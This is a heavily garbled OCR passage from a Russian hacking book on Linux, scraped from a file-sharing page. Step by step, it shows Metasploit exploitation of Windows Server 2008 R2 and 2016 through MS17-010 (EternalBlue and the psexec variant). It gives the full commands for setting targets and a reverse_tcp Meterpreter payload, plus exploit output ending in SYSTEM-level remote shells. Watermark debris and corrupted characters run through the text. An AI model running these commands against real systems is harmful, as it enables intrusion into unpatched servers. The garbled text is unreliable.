Добавил:

Anonymhacker Опубликованный материал нарушает ваши авторские права? Сообщите нам.

Вуз:

Пензенский Государственный Университет

Предмет:

[НЕСОРТИРОВАННОЕ]

Файл:

книги хакеры / Колисниченко Д. Н. Хакинг на linux.pdf

Скачиваний:

Добавлен:

19.04.2024

Размер:

29.19 Mб

Скачать

☆

<<< < Предыдущая 33 34 35 36 37 38 39 40 41 42 43 4445 / 6045 46 47 48 49 50 51 52 53 54 55 56 57 > Следующая >>>

					hang		e
			C				e	E
		X						E
	-							d
	F									t
	D									i
	D									r
P							NOW!			o
P
						BUY
					to	BUY
w Click					to			[*]m			File: /root/karma.db
w Click								[*]m			File: /root/karma.db
w
	w									o
	.			f-xchanresource> use auxiliary/server/browser_autopwn
	.								.c
		p	d					e
			d					g

resource> setg AUTOPWN_HOST 10.0.0.1 AUTOPWN HOST => 10.0.0.1

9.7.9. Команда irb

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

Выполнение этой команды переведет тебя в режим Ruby, где ты сможешь "на лету" писать скрипты и запускать команды:

msfб > irb

[*]Starting IRB shell...

[*]You are in the "framework" object

>>puts "Hello, metasploit!"

Hello, metasploit!

9.8. Практический пример 1: взламываем старенький сервер Windows 2008 с помощью эксплоита АНБ

Наконец-то мы добрались до самого интересного. Настало время собрать все воедино и использовать изученные команды на практике. Мы будем ис пользовать эксплоит EtemalВlue.

EtemalBlue - это эксплоит, который, скорее всего, был разработан АНБ в качестве бывшей уязвимости нулевого дня. Он был выпущен в 2017 году ха керской группой Shadow Brokers, котораяскандально известна утечками ин формации и эксплоитов из Equation Group, которая, как поговаривают, тесно связана с отделом АНБ ТАО (TailoredAccess Operations).

Эксплоит EtemalВlue также известен как MSl7-010 представляет собой уяз вимость в протоколе Microsoft Server Message Block (SMB). SMB позволяет

-системам совместно использовать доступ к файлам, принтерам и другие ре сурсы в сети. Уязвимость присутствует в немного устаревших версиях SMB, позволяющую хакеру установить соединение с нулевым сеансом через ано-

- - - - - - - - - .: . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - . - - - - - - - - - - - - - -- _,

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
1 1.11,а 9. IIL-1ю 11,1011,11111L· \ILl,1,ploil 1111 111.11111:1					BUY	NOW!
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

https:/lwww.microsoft.com/en-us/download/details.aspx?id=11093

search eternalЬlue Matching Modules

Name	Disclosure Date Rank
Check	Description

auxiliary/admin/smЬ/msl7 010 command auxiliary/scanner/smЬ/smЬ_msl7_010 exploit/windows/smЬ/msl7_010_eternalЫue exploit/windows/smЬ/ms17_010_eternalЫue winB exploit/windows/smЬ/msl7 0l0_psexec

.use. . . . . .exploit/windows/sm. . . . . . . . . . . . . . . . . . . . . . . . .Ь. /msl7. . . . . . . . .010. . . . . .eternal. . . . . . . . . .Ы. . ue. . . . . . . . . . . . . . . . . . . . . .	-

•

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to			Просмотримm
w Click							Просмотримm
w
	w								o
	.							.c
		p					show options:
		p					g
			df			n		e
				-xcha

					hang		e
				C			e	E
			X					E
		-							d
		F								t
		D								i
		D								r
	P						NOW!			o
	P
						BUY
					to	BUY
текущие параметры модуля с помощью команды	options илиw Click				to						m
текущие параметры модуля с помощью команды	options илиw Click										m
	w
		w								o
		.							.c
			p					g
				df			n		e
					-x cha

Module options (explo it/windows/smЬ/ms17 0l0_eternalЫue):

Name		Current Setting		Required Description
RHOSTS			yes	ПЕ target acili'ess rarq: or СПR i<i:nti!Er
RPORT		445	yes	The target port (ТСР)
SMBDomain			no	ПЕ Win:Ь,,,s сЬтв:iл to use for autreлticatioo
SMBPass			no	Тhе password for the specified username
SMBUser			no	The username to authenticate as
VERIFY	ARCH	true	yes	C1ec:k if rerote ... mэ.tcres exploit Target.
VERIFY	TARGET	true	yes	Qieck if rerote Сб mэ.t:cnes exploit t.

Exploit target:

Id Name

ОWindows 7 and Server 2008 R2 (х64) All Service Packs

Установим переменную rhosts - IР-адрес цели:

msfб> set rhosts 192.169.1.65 rhosts => 192.169.1.65

Далее мы будем использовать шэлл reverse_tcp в качестве полезной нагрузки:

msf6> set payload windows/x64/meterpreter/reverse_tcp payload => windows/х64/meterpreter/r_everse_tcp

Установим IР адрес локальной машины и порт для прослушки:

msf6> set lhost 192.169.1.3 lhost => 192.169.1.3

msf6> set lport 4321 lport => 4321

Вводим команду run для запуска эксплоита:						•
Вводим команду run для запуска эксплоита:
------·--··-------	·---------	·-------	··---··------	·	-------"·----··-··--------	··--··-·

hang

NOW!

BUY

1,11'..1 ''· llt-111111.;oв,11111< \1t'1,1,ploi1

1 111

111 111\1,1

BUY

w Click

msf6> run

w Click

Started reverse ТСР handler on 192.169.1.3:4321

n [*]

-xcha

-x cha

[*]

192.169.1.65:445 - Connecting to target for exploitation.

[+]

192.169.1.65:445 - Connection estaЫished for exploitation.

[+]

192.169.1.65:445 - Target OS selected valid for OS indicated Ьу SМВ reply

[*]

192.169.1.65:445 - CORE raw buffer dump (51 bytes)

[*]

192.169.1.65:445 - ОхОООООООО 57 69 6е 64 6f 77 73 20 53 65 72 76 65 72 20

Windows Server 2

[*]

192.169.1.65:445 - Ох00000010 30 30 38 20 52 32 20 53 74 61 6е 64 61 72 64

008 R2 Standard

[*]

192.169.1.65:445 - Ох00000020

37 36 30 31 20 53 65 72 76 69 63 65 20 50 61

7601 Service Рас

[*]

192.169.1.65:445 - Ох00000030

6Ь 20 31

[+]192.169.1.65:445 - Target arch selected valid for arch indicated Ьу OCE/RPC reply [*] 192.169.1.65:445 - Trying exploit with 12 Groom Allocations.

[*] 192.169.1.65:445 - Sending all but last fragment of exploit packet [*] 192.169.1.65:445 - Starting non-paged pool grooming

[+]192.169.1.65:445 - Sending SМВv2 buffers

[+]192.169.1.65:445 - Closing SМВvl connection creating free hole adjacent to SМВv2 buffer.

[*]192.169.1.65:445 - Sending final SМВv2 buffers.

[*]192.169.1.65:445 - Sending last fragment of exploit packet!

[*]192.169.1.65:445 - Receiving response from exploit packet

[+]192.169.1.65:445 - EТERNALВLUE overwrite carpleted successfully (0xC000000D) !

[*]192.169.1.65:445 - Sending egg to corrupted connection.

[*]192.169.1.65:445 Triggering free of corrupted buffer.

[*]Sending stage (206403 bytes) to 192.169.1.65

[*]Мeterpreter session 1 opened (192.169.1.3:4321 -> 192.169.1.65:49207) at 2019-03-26 11:01:46 -0500

[+]192.169.1.65:445 - -------------------------------------------------------

[+]192.169.1.65:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=

[+]192.169.1.65:445 - --------------------------------------------= =---------

meterpreter >

Разберемся, что все это означает. Мы устанавливаем SМВ-соединение и отправляем эксплоит-пакет. Наконец, мы видим WIN и открывается сеанс meterpreter. Другими словами, мы только что хакнули сервер. Конечно, если сервер пропатчен, что у нас ничего не выйдет, но так как мы скачали эталон ную систему 2008 R2, где точно есть эта уязвимость, то должно все полу читься. Только не обновляй ее сразу после установки.

После того, как ты увидел приглашение meterpreter, ты можешь вводить лю бые команды, и они будут выполнены на удаленной (хакнутой) системе. Например, можем ввести команду sysinfo (самая безобидная):

sysinfo
Computer	: S02

------------------------------

·····--··--···--···--·-·····-···-···-········-····f!il

				hang		e
			C			e	E
		X					E
	-						d
	F							t
	D							i
	D								r
P						NOW!			o
P
					BUY
w Click				to	BUY		os m
w Click				to			os m
w
	w								o
	.		df-xchanArchitecture
	.						.c
		p					g
							e

System Language

Domain

Logged On Users

Meterpreter

					hang		e
				C			e	E
			X					E
		-							d
		F								t
		D								i
		D								r
	P						NOW!			o
	P
						BUY
					to	BUY
Windows 2008 R2	(Build 7601, Service Pack 1).				to
Windows 2008 R2	(Build 7601, Service Pack 1).										m
	w Click										m
	w
х64		w		df-x chan						o
х64		.		df-x chan					.c
			p					g
									e

en US DLAB

x64/windows

9.9. Практический пример 2: хакаем современные системы -Windows Server 2016 и Windows 10

nmap.

nmap

--script

nmap --script smЬ-vuln-msl 7-010 -v 192.. 169 .1.1/24

... - - nmap - - - •- .

. . . . . . . .. . . . . . . . - . .... - - - - . - . - - - - - - - . - - - - - - - - - - - . - - - - - - - . - - - - - - - - - - - - - - - - - -

				hang		e
			C			e	E
		X					E
	-						d
	F							t
	D							i
	D							r
P						NOW!		o
P
					BUY
				to	BUY
w Click				to			Starting Nmap 9.70 ( https://nmap.org ) at 2022-12-10 11:05 MSK

									m
w
	w		df					o
	.		df			nNSE: Loaded 1 scripts for scanning.
	.						.c
		p					g
				-xcha			e
				-xcha			NSE: Script Pre-scanning.
							NSE: Script Pre-scanning.

Initiating NSE at 11:05

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

Host script results: smЬ-vuln-ms17-010:

VULNERABLE:

Remote Code Execution vulneraЬility in Мicrosoft SМВvl servers (msl7-010) State: VULNERABLE

IDs: CVE:CVE-2017-0143 Risk factor: HIGH

А critical remote code execution vulneraЬility exists in Мicrosoft SМВVl servers (ms17-010).

Disclosure date: 2017-03-14 References:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 https://Ь l ogs.technet.microsoft.com/msrc/2017 /05/12/customer

guidance-for-wannacrypt-attacks/

1https;//technet.microsoft.com/en-us/library/security/msl7-010.aspx

NSE: Script Post-scanning.

Initiating·NSE at 11:05

Completed NSE at 11:05, O.OOs elapsed

Read data files from: /usr/Ьin/../share/nmap

msfconsole
search	eternal romance
Matching Modules
Name	Disclosure Date Rank	Check Description
auxiliary/admin/smЬ/ms17_010 ccmnand 2017-03-14		normal Yes	МS17-010

Eternal.Ranance/Et ernalSynergy/EternalChaпpion SМВ Rerrote Windows		Ccmnand Execution
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..
exploit/windows/smЬ/ms17_010ysexec 2017-03-14	normal	No	МS17-010
•Eternal.Ranance/EternalSynergy/EternalChaпpion SМВ Rerrcte	Windows	Code Execution

hang

NOW!

BUY

wClick

Фреймворкo

нашел два модуля. Мы будем использовать exploit/windows/smwЫClick

msl7_0lO_psexec:

-xcha

-x cha

use exploit/windows/smЬ/msl7 0l0_psexec

Просмотрим опции модуля:

options

Все параметры невозможно уместить на странице книги, поэтому приводим скриншот.

Рис. 9.8. Параметры модуля exp/oitlwindows/smЬ/msl7_0J0_psexec

Как и в прошлом случае, нам нужно установить удаленный узел, полезную нагрузку, локальную машину и локальный порт:

msf6> set rhosts 192.169.1.50		·····
-----· - --- -- - - --- ·-· ·-·.... .	----· . --- ... ................	·····
rhosts => 192.169.1.50

msf6> set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp

hang

NOW!

BUY

w Click

msf6>m

set

lhost

192.169.1.3

-xcha

192.169.1.3

lhost

msf6>

set

lport

4321

lport

4321

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

[*]Started reverse ТСР handler on 192.169.1.3:4321

[*]192.169.1.50:445 - Target OS: Windows Server 2016 Standard

Evaluation 14393

[*] 192.169.1.50:445 - Built а write-what-where primitive ...

[+] 192.169.1.50:445 - Overwrite complete.•. SYSTEM session obtained!

[*]192.169.1.50:445 - Selecting PowerShell target

[*]192.169.1.50:445 - Executing the payload ...

[+] 192.169.1.50:445 - Service start timed out, ОК if running а

command or non-service executaЫe...

[*]Sending stage (206403 bytes) to 192.169.1.50

[*]Мeterpreter session 2 opened (192.169.1.3:4321 -> 192.169.1.50:49965)

at 2019-03-26 11:12:30 -0500

	meterpreter
sysinfo
Computer	DC0l
os	Windows 2016 (Build 14393).
Architecture	х64
System Language	en US
Domain	DLAB
Logged On Users	4
Meterpreter	x64/windows

Примечательно, если мы введем getuid, чтобы получить UID пользователя, мы увидим, что мы работаем от имени системы:

Server username: NT AUTHORITY\SYSTEM

Как только что было показано, можно относительно легко взломать совре

менную версию Windows Server, если она не была вовремя пропатчена. Если
•
ты являешься сисадмином, то только что мы наглядно продемонстрирова-
·--------------	···--·---··--·······-···---···--·---·---···-···--··--··---···-···-·81

hang

NOW!

BUY

Click

ли

зачем нужно устанавливать заплатки безопасности и обновления. ПроClick

демонстрированная нами угроза до сих пор остается актуальной, посколь

-xcha

-x cha

ку далеко не все админы старательно относятся к своим обязанностям. В результате имеем огромную дыру в безопасности, через которую могут не только улетучиться данные (утечка), но и пострадать вся система.

1!11	•
	--- .

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

Глава 10.

Взлом и защита а:к:каунтов в социальных сетях

<<< < Предыдущая 33 34 35 36 37 38 39 40 41 42 43 4445 / 6045 46 47 48 49 50 51 52 53 54 55 56 57 > Следующая >>>

Соседние файлы в папке книги хакеры

#
19.04.20249.61 Mб16Как_защитить_себя_в_цифровом_мире_.pdf
#
19.04.20244.58 Mб15Кевин Митник Призрак в сети.pdf
#
19.04.20242.68 Mб15кибербезопасность.pdf
#
19.04.202419.49 Mб17Кибербезопасность_стратегия_атак_и_обороны.pdf
#
19.04.2024396.03 Кб13Книга хакеры.pdf
#
19.04.202429.19 Mб17Колисниченко Д. Н. Хакинг на linux.pdf
#
19.04.20242.75 Mб15Криптография.pdf
#
19.04.202438.52 Mб17Курс_по_кибер_безопастности_Секреты_хакеров.pdf
#
19.04.20242.94 Mб16Линдер_Кани_Тим_Кук_Гений,_который_вывел_Apple_на_новый_уровень.pdf
#
19.04.202417.17 Mб18Майкл_Сикорски,_Эндрю_Хониг_Вскрытие_покажет!_Практический_анализ.pdf
#
19.04.20246.23 Mб16Михаил_Флёнов_Компьютер_глазами_хакера.pdf